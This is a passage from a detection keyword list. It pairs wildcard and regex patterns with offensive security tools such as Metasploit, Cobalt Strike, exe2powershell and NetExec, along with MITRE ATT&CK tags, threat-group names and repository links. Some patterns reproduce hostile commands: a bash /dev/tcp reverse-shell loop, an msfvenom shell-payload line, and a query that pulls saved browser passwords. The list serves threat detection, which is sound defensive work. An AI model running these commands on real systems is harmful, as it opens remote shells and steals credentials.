and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*exchange_proxynotshell_rce.*",".{0,1000}exchange_proxynotshell_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*exe_dll_shellcode genetic.config*",".{0,1000}exe_dll_shellcode\sgenetic\.config.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*exe_stager.exe*",".{0,1000}exe_stager\.exe.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*exe_to_dll.exe*",".{0,1000}exe_to_dll\.exe.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*exe_to_dll.exe*",".{0,1000}exe_to_dll\.exe.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*exe_to_dll_*.zip*",".{0,1000}exe_to_dll_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a 
EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*exe_to_dll_*_32bit.zip*",".{0,1000}exe_to_dll_.{0,1000}_32bit\.zip.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*exe_to_dll_*_64bit.zip*",".{0,1000}exe_to_dll_.{0,1000}_64bit\.zip.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*exe_to_dll-master*",".{0,1000}exe_to_dll\-master.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*exe_to_dll-master*",".{0,1000}exe_to_dll\-master.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*exe2bat.cpp*",".{0,1000}exe2bat\.cpp.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","158","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*exe2bat.exe*",".{0,1000}exe2bat\.exe.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","158","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*exe2powershell.cpp*",".{0,1000}exe2powershell\.cpp.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","158","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*exe2powershell.exe*",".{0,1000}exe2powershell\.exe.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","158","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*exe2powershell-master*",".{0,1000}exe2powershell\-master.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","158","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*exec 5<>/dev/tcp/*/*;cat <&5 | while read line; do $line 2>&5 >&5; done*",".{0,1000}exec\s5\<\>\/dev\/tcp\/.{0,1000}\/.{0,1000}\;cat\s\<\&5\s\|\swhile\sread\sline\;\sdo\s\$line\s2\>\&5\s\>\&5\;\sdone.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*exec CMD=/bin/sh -f elf -o *.elf*",".{0,1000}exec\sCMD\=\/bin\/sh\s\-f\self\s\-o\s.{0,1000}\.elf.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Exec_Command_Silent.vbs*",".{0,1000}Exec_Command_Silent\.vbs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Exec_Command_WithOutput.vbs*",".{0,1000}Exec_Command_WithOutput\.vbs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*exec_payload_msi*",".{0,1000}exec_payload_msi.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*exec_shellcode.rb*",".{0,1000}exec_shellcode\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ExecCmdImplant*",".{0,1000}ExecCmdImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Exec-Command-Silent.vbs*",".{0,1000}Exec\-Command\-Silent\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*--exec-method smbexec*",".{0,1000}\-\-exec\-method\ssmbexec.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks.
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*execmethod*PowerPick*",".{0,1000}execmethod.{0,1000}PowerPick.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*execmethod*PowerShell*",".{0,1000}execmethod.{0,1000}PowerShell.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*execPayloads.txt*",".{0,1000}execPayloads\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*exec-sc-rand.ps1*",".{0,1000}exec\-sc\-rand\.ps1.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*ExecStartPre present! 
ExecStartPre was modified!*",".{0,1000}ExecStartPre\spresent!\sExecStartPre\swas\smodified!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*Executable_Files-main.zip*",".{0,1000}Executable_Files\-main\.zip.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*execute PowerShell without powershell.exe*",".{0,1000}execute\sPowerShell\swithout\spowershell\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*Execute('SELECT origin_url,username_value,password_value,length(password_value*",".{0,1000}Execute\(\'SELECT\sorigin_url,username_value,password_value,length\(password_value.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - 
T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*execute_assembly SharpCloud*",".{0,1000}execute_assembly\sSharpCloud.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*execute_bof *",".{0,1000}execute_bof\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*execute_dotnet_assembly.*",".{0,1000}execute_dotnet_assembly\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*execute_embed_docm(*",".{0,1000}execute_embed_docm\(.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*execute_payload(priv_esc*",".{0,1000}execute_payload\(priv_esc.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*execute_pe -PE*",".{0,1000}execute_pe\s\-PE.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*execute_Pezor*",".{0,1000}execute_Pezor.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*execute_shellcode *",".{0,1000}execute_shellcode\s.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 
- TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*Execute-ACLight.bat*",".{0,1000}Execute\-ACLight\.bat.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Execute-ACLight2.bat*",".{0,1000}Execute\-ACLight2\.bat.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*execute-assembly *",".{0,1000}execute\-assembly\s.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*execute-assembly *.exe *",".{0,1000}execute\-assembly\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*execute-assembly *.exe /ldap:all /filter:sysvol*netlogon*ipc$*print$*",".{0,1000}execute\-assembly\s.{0,1000}\.exe\s\/ldap\:all\s\/filter\:sysvol.{0,1000}netlogon.{0,1000}ipc\$.{0,1000}print\$.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*execute-assembly *asreproast*",".{0,1000}execute\-assembly\s.{0,1000}asreproast.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*execute-assembly *kerberoast*",".{0,1000}execute\-assembly\s.{0,1000}kerberoast.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*execute-assembly -c EnableAllTokenPrivs.EnableAllTokenPrivs *",".{0,1000}execute\-assembly\s\-c\sEnableAllTokenPrivs\.EnableAllTokenPrivs\s.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*execute-assembly SharpBlock*",".{0,1000}execute\-assembly\sSharpBlock.{0,1000}","offensive_tool_keyword","SharpBlock","A method of 
